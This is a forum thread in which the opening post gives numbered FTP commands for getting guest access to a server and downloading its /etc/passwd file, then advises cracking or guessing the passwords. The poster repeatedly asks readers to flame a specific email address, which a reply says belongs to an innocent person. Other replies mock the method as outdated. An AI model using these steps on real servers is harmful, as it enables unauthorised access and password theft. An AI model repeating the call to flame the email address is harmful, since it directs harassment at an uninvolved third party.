Want to hack a website ?
Page 1 of 2 12 LastLast

Thread: Want to hack a website ?

Auto-Banned

Want to hack a website ?

This is for educated purposes only...the best way to stop a hacker is to know what the hacker does ... WARNING: IT CAN, AND MOST LIKELY IN MOST CASES, IS ILLEGAL! I TAKE NO PART OF ANYTHING YOU DO !!!!

Here is a hack for windows you can use to get password files from shells. It uses the ftp protocol. They are most likely going to be shadowed.
    But you can finger them or try to guess passwords for the logins.

You can do this on jus plain ol shells and **** too, it doesn't have to be on an ftp server

step1. Ok what you first do is go the run prompt
    step2. type command to get a dos command prompt
    step3. ok type ftp server.to.hack.com (TYPE A SERVER NOT server.to.hack.com FOR THE LAMAHS READING THIS)
    step4. You should be prompted to login just hit enter without typing anything
    step5. Now you should be prompted for a password again just hit enter without typeing anything
    step6. Type "quote user ftp" now hit enter
    step7. type "quote cwd ~root" now hit enter
    step8. type "quote pass ftp" now hit enter

You now have guest access and can download the password file to **** with

step9. type "cd etc" then enter to go to the etc directory which contains the password file
    step10. type "get passwd" hit enter this will download the password file to yer harddrive

ok you now have the password file, open c:\passwd with the notepad
    if it is encrypted crack it if not figure out some logins by guessing to guess it works good to finger the address
    then to use the information you get there to guess a password

Plz send dirrect flames to chase_nordy_2001@yahoo.com

Auto-Banned
    PLEASE FLAME WITH UR BEST INSULTS AT chase_nordy_2001@yahoo.com, plz, ill give u a keg of my fine beer! (or lemonade for ppl under 21)!

Auto-Banned
    I'm leaving now so could u send any thx or flames to chase_nordy_2001@yahoo.com ...thx

Ok, I'll bite on the "for educational purposes" and ask a serious question in return.

Now that you have told us howto crack a website (sometimes), how would you go about preventing it from a security standpoint. What steps should we take to make sure a wannabe hacker/cracker doesn't do that to our system.

That is why we are here, right?
    The more I deal with people, the more I LOVE my computer.

str34m3r
    Um... just a few posts ago, you were asking how to ask. Now you post this like you're an expert in hacking? Is anyone else confused?

Huh, like this serves a purpose best put ftp 101 oh oh wait finger, me thinks I'll go back visit archie..lol..what is this gonna really do? Oh I hacked some personal web page or wait better yet one of the few connects in a 3rd world country...but hey I own it kewl thing. Am not impressed with a 10 year old script where is the good stuff and I'll take a glass of cold water. As for the link best judge is the lack of response then go figure again
    I believe that one of the characteristics of the human race - possibly the one that is primarily responsible for its course of evolution - is that it has grown by creatively responding to failure.- Glen Seaborg

Banned
    Hmm, Eat **** and die.... He is trying to get us to flame some innocent guys email addy....

Totall lame threads I agree hey I needed a laugh today got it Ac1sp did you LOL glad my face wrinkels are from smiles and not a frown...good day I'd say.
    I believe that one of the characteristics of the human race - possibly the one that is primarily responsible for its course of evolution - is that it has grown by creatively responding to failure.- Glen Seaborg

Banned
    I'm amazed, Dark[Zeus] has only posted 30 times and he is already on triple red for negative antipoints.

str34m3r
    Where I come from, we called that "a special kind of stupid."